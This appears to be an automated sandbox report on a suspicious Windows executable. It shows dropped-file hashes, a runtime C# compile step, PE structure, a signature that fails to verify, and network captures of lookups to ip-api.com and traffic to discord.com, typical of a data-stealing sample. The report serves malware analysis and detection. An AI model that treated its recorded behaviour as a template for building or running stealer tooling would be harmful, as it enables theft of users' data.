Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.0.cs"

C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1501686372996494
Encrypted:	false
SSDEEP:	48:6r7oEAtf0KhzBU/zKf6mtJlN0RhpW1ulVIa30Hq:RNz0hmNORhvIK0
MD5:	C8816BB5B8D2C669BA2541BD2B0DFF9C
SHA1:	EB9C26C79DE67277BC43BC55E502DB952DD651CD
SHA-256:	2579B6C6285066ACB92D7E6735FF22F504A608065370DF49B6E34A3D60E3309E
SHA-512:	A40D6ECD4F59CD515EA0378EE98A6FD8A413FD8D0418EA11B87628A7B23E06005A287AE61C82F9C6E52A4B61C199A6F1C2C6B9BB48FFAF52F72D4B8C244605CD
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (717), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1158
Entropy (8bit):	5.470307226088961
Encrypted:	false
SSDEEP:	24:KOaQMAkId3ka6KOkqeFk/aJETaQKax5DqBVKVrdFAMBJTH:+Skkka6NkqeFkSJE+QK2DcVKdBJj
MD5:	87CE36056A6FF150071373D91DA5EEF1
SHA1:	F77A1E7D785167C52E5BB201D7F55B5930C4D5E7
SHA-256:	93390B6CD44A87674AD781037BBBB997E048DAD7DCE65365F53321B122588FEE
SHA-512:	EFD686E5920FD0FE77530531CE5992E8D8905451B1879B0972619DFC4BC6CCD903630E99C91977249954FB410D1404034FAE38527AEF2C773F61A0C75F325209
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..user Version: 0.0.0.0....No user/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.993060687272905
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wsapx.exe
File size:	7'839'456 bytes
MD5:	e302186ae6217d48fc6eef1fe780ec26
SHA1:	17fcd5699fc208e8b520eb9ad1c0b4a0305a5f0a
SHA256:	3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672
SHA512:	29cd7dc1704ba96d71e4cde67fd1d61426dff8c67003121ff4b2c60fd39066f9fe208717f3f1fd78ad991881681b9c9b4c9e790454963caaac3901d2b32313f2
SSDEEP:	196608:cdLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jt:SL+9qz8LD7fEUbiIqQgpt
TLSH:	3A863358A3A80CE0EE76503DDB56DC8BDB76F9022B10C9CB17A563266E27CC58437B71
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	212303032313271a

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x67550E17 [Sun Dec 8 03:10:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	28/09/2021 20:00:00 28/09/2024 19:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F05BD48844Ch
dec eax
add esp, 28h
jmp 00007F05BD48806Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F05BD488818h
test eax, eax
je 00007F05BD488213h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F05BD4881F7h
dec eax
cmp ecx, eax
je 00007F05BD488206h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007F05BD4881E0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F05BD4881E9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F05BD4881F9h
mov byte ptr [000356F5h], 00000001h
call 00007F05BD487945h
call 00007F05BD488C30h
test al, al
jne 00007F05BD4881F6h
xor al, al
jmp 00007F05BD488206h
call 00007F05BD49574Fh
test al, al
jne 00007F05BD4881FBh
xor ecx, ecx
call 00007F05BD488C40h
jmp 00007F05BD4881DCh
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007F05BD488259h
cmp ecx, 01h
jnbe 00007F05BD48825Ch
call 00007F05BD48878Eh
test eax, eax
je 00007F05BD48821Ah
test ebx, ebx
jne 00007F05BD488216h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007F05BD495542h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x32b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x777a98	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	4a4040b0038d1e3c8f998d706f5afb49	False	0.5243229166666666	data	5.750772643174072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x32b8	0x3400	e65a00d83f520c22dfdafe892440ef3c	False	0.8287259615384616	data	7.466048435400415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4b000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47250	0x1c1	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1.024498886414254
RT_ICON	0x47414	0x20c	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	1.0209923664122138
RT_ICON	0x47620	0x273	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	1.0175438596491229
RT_ICON	0x47894	0x434	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	1.0102230483271375
RT_ICON	0x47cc8	0x53e	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	1.0081967213114753
RT_ICON	0x48208	0x9b9	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	1.004419445560466
RT_ICON	0x48bc4	0xdc3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.930456996877661
RT_GROUP_ICON	0x49988	0x68	data	0.7403846153846154
RT_VERSION	0x499f0	0x3b8	COM executable for DOS	0.45063025210084034
RT_MANIFEST	0x49da8	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:37:23.488471031 CET	49721	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:37:23.608211040 CET	80	49721	208.95.112.1	192.168.2.6
Dec 13, 2024 08:37:23.608304977 CET	49721	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:37:23.609836102 CET	49721	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:37:23.729517937 CET	80	49721	208.95.112.1	192.168.2.6
Dec 13, 2024 08:37:24.707539082 CET	80	49721	208.95.112.1	192.168.2.6
Dec 13, 2024 08:37:24.766944885 CET	49721	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:37:24.887070894 CET	80	49721	208.95.112.1	192.168.2.6
Dec 13, 2024 08:37:24.887151003 CET	49721	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:38:01.387092113 CET	49823	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:38:01.506902933 CET	80	49823	208.95.112.1	192.168.2.6
Dec 13, 2024 08:38:01.506979942 CET	49823	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:38:01.507622004 CET	49823	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:38:01.627557039 CET	80	49823	208.95.112.1	192.168.2.6
Dec 13, 2024 08:38:02.717205048 CET	80	49823	208.95.112.1	192.168.2.6
Dec 13, 2024 08:38:02.841561079 CET	49823	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:38:03.960500956 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:03.960556984 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:03.960635900 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:03.991020918 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:03.991045952 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.206526041 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.206934929 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.206964970 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.208031893 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.208098888 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.209430933 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.209501982 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.209778070 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.209786892 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.209924936 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.209955931 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210103989 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210154057 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210284948 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210325956 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210427999 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210443974 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210464954 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210474968 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210527897 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210546017 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210568905 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210580111 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210597992 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210606098 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210638046 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210650921 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210654020 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210664988 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210679054 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210695028 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210700035 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210712910 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210715055 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210731030 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210747957 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210756063 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210768938 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210777044 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210797071 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210803986 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210820913 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210829973 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210839987 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210845947 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210870028 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210870028 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210879087 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210886955 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210902929 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210910082 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.210936069 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210959911 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210979939 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.210997105 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211013079 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211033106 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211050034 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211061954 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211082935 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211095095 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211138010 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211147070 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211175919 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211186886 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211198092 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211237907 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211261034 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211267948 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.211280107 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255357981 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.255530119 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255573034 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.255590916 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255600929 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.255619049 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255625010 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.255660057 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255675077 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.255702972 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255713940 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:05.255795956 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255847931 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.255884886 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:05.299340010 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:06.697077990 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:06.697161913 CET	443	49832	162.159.136.232	192.168.2.6
Dec 13, 2024 08:38:06.697443962 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:06.697967052 CET	49832	443	192.168.2.6	162.159.136.232
Dec 13, 2024 08:38:06.711965084 CET	49823	80	192.168.2.6	208.95.112.1
Dec 13, 2024 08:38:06.833393097 CET	80	49823	208.95.112.1	192.168.2.6
Dec 13, 2024 08:38:06.833462000 CET	49823	80	192.168.2.6	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:37:21.153080940 CET	65488	53	192.168.2.6	1.1.1.1
Dec 13, 2024 08:37:21.458700895 CET	53	65488	1.1.1.1	192.168.2.6
Dec 13, 2024 08:37:23.345387936 CET	60136	53	192.168.2.6	1.1.1.1
Dec 13, 2024 08:37:23.484407902 CET	53	60136	1.1.1.1	192.168.2.6
Dec 13, 2024 08:38:01.247154951 CET	54361	53	192.168.2.6	1.1.1.1
Dec 13, 2024 08:38:01.386079073 CET	53	54361	1.1.1.1	192.168.2.6
Dec 13, 2024 08:38:03.821487904 CET	55585	53	192.168.2.6	1.1.1.1
Dec 13, 2024 08:38:03.959752083 CET	53	55585	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 08:37:21.153080940 CET	192.168.2.6	1.1.1.1	0xb629	Standard query (0)	blank-5eoty.in	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:23.345387936 CET	192.168.2.6	1.1.1.1	0x91d8	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:01.247154951 CET	192.168.2.6	1.1.1.1	0x9d8a	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:03.821487904 CET	192.168.2.6	1.1.1.1	0x28f0	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 08:37:21.458700895 CET	1.1.1.1	192.168.2.6	0xb629	Name error (3)	blank-5eoty.in	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:23.484407902 CET	1.1.1.1	192.168.2.6	0x91d8	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:01.386079073 CET	1.1.1.1	192.168.2.6	0x9d8a	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:03.959752083 CET	1.1.1.1	192.168.2.6	0x28f0	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:03.959752083 CET	1.1.1.1	192.168.2.6	0x28f0	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:03.959752083 CET	1.1.1.1	192.168.2.6	0x28f0	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:38:03.959752083 CET	1.1.1.1	192.168.2.6	0x28f0	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
